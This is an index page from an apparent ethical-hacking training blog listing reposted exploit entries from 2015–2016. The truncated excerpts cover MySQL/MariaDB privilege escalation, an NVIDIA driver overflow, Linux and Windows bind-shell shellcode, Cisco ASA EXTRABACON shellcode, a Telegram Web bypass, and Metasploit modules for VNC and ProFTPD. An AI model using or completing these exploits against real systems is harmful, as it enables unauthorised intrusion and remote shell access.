Exploits

Home » Exploits

MySQL / MariaDB / PerconaDB – ‘root’ Privilege Escalation Vulnerability – Metasploit Code

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Dawid
I. VULNERABILITY
————————-
 
MariaDB / MySQL / PerconaDB   –   Root Privilege Escalation
 
MySQL 
    <= 5.5.51
    <= 5.6.32
    <= 5.7.14
 
MariaDB
    All current
 
Percona Server
    < 5.5.51-38.2
    < 5.6.32-78-1
    < 5.7.14-8
 
Percona XtraDB Cluster
    < 5.6.32-25.17
    < 5.7.14-26.17
    < 5.5.41-37.0
 
 
II. BACKGROUND
————————-
 
MySQL:
 
“MySQL is the world’s most popular open source database.
Whether you are a fast growing web property, technology ISV or large
enterprise, MySQL […]

By |November 3rd, 2016|Exploits|

NVIDIA Driver – NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Priv

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

The NvStreamKms.sys driver calls PsSetCreateProcessNotifyRoutineEx to set up a
process creation notification routine.
 
In this particular routine,
 
if ( cur->image_names_count > 0 ) {
  // info_ is the PPS_CREATE_NOTIFY_INFO that is passed to the routine.
  image_filename = info_->ImageFileName;
  buf = image_filename->Buffer;
  if ( buf )
  {
    if ( !v5 )
    {
      i = 0i64;
      num_chars = image_filename->Length […]

By |November 3rd, 2016|Exploits|

Linux/x86-64 – Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CripSlick
#include <stdio.h>
#include <string.h>
 

 
//|=========================================================================================
//|=============== CripSlick’s Persistent Bind-Shell with Port-Range + password ============
//|
//|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
//| […]

By |October 31st, 2016|Exploits|

Linux/x86 – NetCat Bind Shell with Port using C Programming

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: CripSlick
#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C “fork”
#include <stdlib.h> //| needed for C “system”
 
//|=====================================================================================================
//|================================ CripSlick’s Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick’s NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I […]

By |October 31st, 2016|Exploits|

Windows/x86 – Password Protected TCP Bind Shell

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Brother Roziul Hasan Khan
/*
    # Title : Windows x86 password protected bind shell tcp shellcode
    # size : 637 bytes
    # Tested On : Windows 7 ultimate x86 x64
*/
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   99                      cltd  
   1:   64 8b 42 30             mov    %fs:0x30(%edx),%eax
   5:   8b 40 0c                mov    0xc(%eax),%eax
   8:   8b […]

By |October 29th, 2016|Exploits|

Cisco ASA – Authentication Bypass ‘EXTRABACON’ (Improved Shellcode)

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: RiskSense
Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes);

 Description:
            This is not the same shellcode as the Equation Group version,
            but accomplishes the same task of disabling the auth functions
            […]

By |October 29th, 2016|Exploits|

Telegram Web 0.5.5 Username Bypass Vulnerability – Easy Mode

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

Credits: Malware4u
#########################################################################
# Exploit Title: Telegram Web Empty Username Bypass
# version : Telegram Web 0.5.5
# Tested on: Windows 10
##########################################################################
Description:
Telegram filters null bytes for username input but you can bypass this
filter with “NOP”s (0x90) on web version of Telegram because this
filter isn’t from server’s codes side
##########################################################################
Step 1:
First […]

By |October 29th, 2016|Exploits|

German Military Hacked Afghan Mobile Operator to Discover Hostage’s Whereabouts

Ethical Hacking Training Institute
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan

A special cyber unit of the Bundeswehr (German Armed Forces) carried out Germany’s first ever offensive cyber-operation by hacking into the network of an Afghani mobile operator to track the location of a group of kidnappers that had taken hostage a young German woman.

The woman, […]

By |September 25th, 2016|Exploits|

VNC Keyboard Remote Code Execution Exploit

Advanced Ethical Hacking Institute in Pune

 

Full title
VNC Keyboard Remote Code Execution Exploit

Date add
13-07-2015

Category
remote exploits

Platform
multiple

Risk

Security Risk Critical

Description:
This Metasploit module exploits VNC servers by sending virtual keyboard keys and executing a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager payload is typed and executed. On Unix/Linux systems a xterm terminal is opened […]

By |July 14th, 2015|Exploits|

Exploit: ProFTPD 1.3.5 Mod_Copy Command Execution

Advanced Ethical Hacking Institute in Pune
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      ‘Name’           => ‘ProFTPD 1.3.5 Mod_Copy Command Execution’,
      ‘Description’    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the […]

By |June 23rd, 2015|Exploits|